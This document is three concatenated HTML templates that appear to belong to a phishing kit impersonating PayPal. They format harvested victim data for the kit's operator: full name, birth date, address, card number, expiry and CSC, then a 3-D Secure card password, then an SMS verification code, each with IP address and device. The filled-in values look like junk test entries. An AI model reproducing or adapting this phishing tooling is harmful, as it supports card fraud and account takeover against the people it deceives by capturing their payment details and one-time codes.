
			<!DOCTYPE html>
			<html>
			<head><meta charset="windows-1252"><style type="text/css">*{padding: 0;margin: 0;box-sizing: border-box;}</style>
			</head>
			<body>
					<div style="height:100%;min-height: 100vh;width:100%;background-color: #009cde;background-image: radial-gradient(circle farthest-side at center bottom,#009cde,#003087 125%);padding: 25px 0">
						<div style="margin: 0 auto;width:600px;border:2px solid white;padding: 20px;">

							<div><img src="https://i.imgur.com/vtGfl4n.png" style="height: 50px;margin:0 auto;display: block;"></div>

							<h1 style="color: #fff;text-align: center;padding: 20px 0;font-family: arial;">NEW PPL BILL & CC</h1>
							<div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">FULL NAME :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										sad sdad
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">DATE OF BIRTH :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										02/02/1992
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">STREET ADDRESS :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										sdadsdas
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">CITY :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										sdasd
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">ZIP CODE :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										0900
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">COUNTRY :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										Albania
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">PHONE NUMBER :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										3131231231231
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">CARD NUMBER :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										1313123123131231
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">EXPIRATION DATE :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										02/22
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">CSC :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										123
									</h2>
								</div>
							</div>
							<h1 style="color: #fff;text-align: center;padding: 0 0 20px 0;font-family: arial;">USER AGENT</h1>
							<div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">DATE & TIME :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										12-03-2021 04:47:20 PM
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">IP ADDRESS :</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;">
										<a style="color: #022652" target="_blank" href="https://whatismyipaddress.com/ip/209.208.245.154">209.208.245.154</a>
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">SYSTEM :	</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										iPhone
									</h2>
								</div>
								<div style="margin-bottom: 20px;">
									<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">BROWSER :	</span>
									<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
										Handheld Browser
									</h2>
								</div>
							</div>

						</div>
					</div>
				</body>
				</html>
			<!DOCTYPE html>
			<html>
			<head><meta charset="windows-1252"><style type="text/css">*{padding: 0;margin: 0;box-sizing: border-box;}</style>
			</head>
			<body>
				<div style="background-color: blue;height:100%;min-height: 100vh;width:100%;background-color: #009cde;background-image: radial-gradient(circle farthest-side at center bottom,#009cde,#003087 125%);padding: 25px 0">
					<div style="margin: 0 auto;width:600px;border:2px solid white;padding: 20px;">

						<div><img src="https://i.imgur.com/vtGfl4n.png" style="height: 50px;margin:0 auto;display: block;"></div>

						<h1 style="color: #fff;text-align: center;padding: 20px 0;font-family: arial;">NEW PPL VBV</h1>
						<div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">CARD PASSWORD :</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									asdadasd
								</h2>
							</div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">DATE OF BIRTH :</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									02/02/1992
								</h2>
							</div>
						</div>
						<h1 style="color: #fff;text-align: center;padding: 0 0 20px 0;font-family: arial;">USER AGENT</h1>
						<div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">DATE & TIME :</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									12-03-2021 04:47:29 PM
								</h2>
							</div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">IP ADDRESS :</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;">
									<a style="color: #022652" target="_blank" href="https://whatismyipaddress.com/ip/209.208.245.154">209.208.245.154</a>
								</h2>
							</div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">SYSTEM :	</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									iPhone
								</h2>
							</div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">BROWSER :	</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									Handheld Browser
								</h2>
							</div>
						</div>

					</div>
				</div>
			</body>
			</html>
			<!DOCTYPE html>
			<html>
			<head><meta charset="windows-1252"><style type="text/css">*{padding: 0;margin: 0;box-sizing: border-box;}</style>
			</head>
			<body>
				<div style="height:100%;min-height: 100vh;width:100%;background-color: #009cde;background-image: radial-gradient(circle farthest-side at center bottom,#009cde,#003087 125%);padding: 25px 0">
					<div style="margin: 0 auto;width:600px;border:2px solid white;padding: 20px;">

						<div><img src="https://i.imgur.com/vtGfl4n.png" style="height: 50px;margin:0 auto;display: block;"></div>

						<h1 style="color: #fff;text-align: center;padding: 20px 0;font-family: arial;">NEW PPL SMS CODE</h1>
						<div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">SMS CODE :</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									123123
								</h2>
							</div>
						</div>
						<h1 style="color: #fff;text-align: center;padding: 0 0 20px 0;font-family: arial;">USER AGENT</h1>
						<div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">DATE & TIME :</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									12-03-2021 04:48:29 PM
								</h2>
							</div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">IP ADDRESS :</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;">
									<a style="color: #022652" target="_blank" href="https://whatismyipaddress.com/ip/209.208.245.154">209.208.245.154</a>
								</h2>
							</div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">SYSTEM :	</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									iPhone
								</h2>
							</div>
							<div style="margin-bottom: 20px;">
								<span style="color: #fff;font-weight: bold;font-family: arial;margin-bottom: 5px;display: block;">BROWSER :	</span>
								<h2 style="background-color: #fff;font-family: arial;display: inline-block;padding: 5px 10px;color: #022652">
									Handheld Browser
								</h2>
							</div>
						</div>

					</div>
				</div>
			</body>
			</html>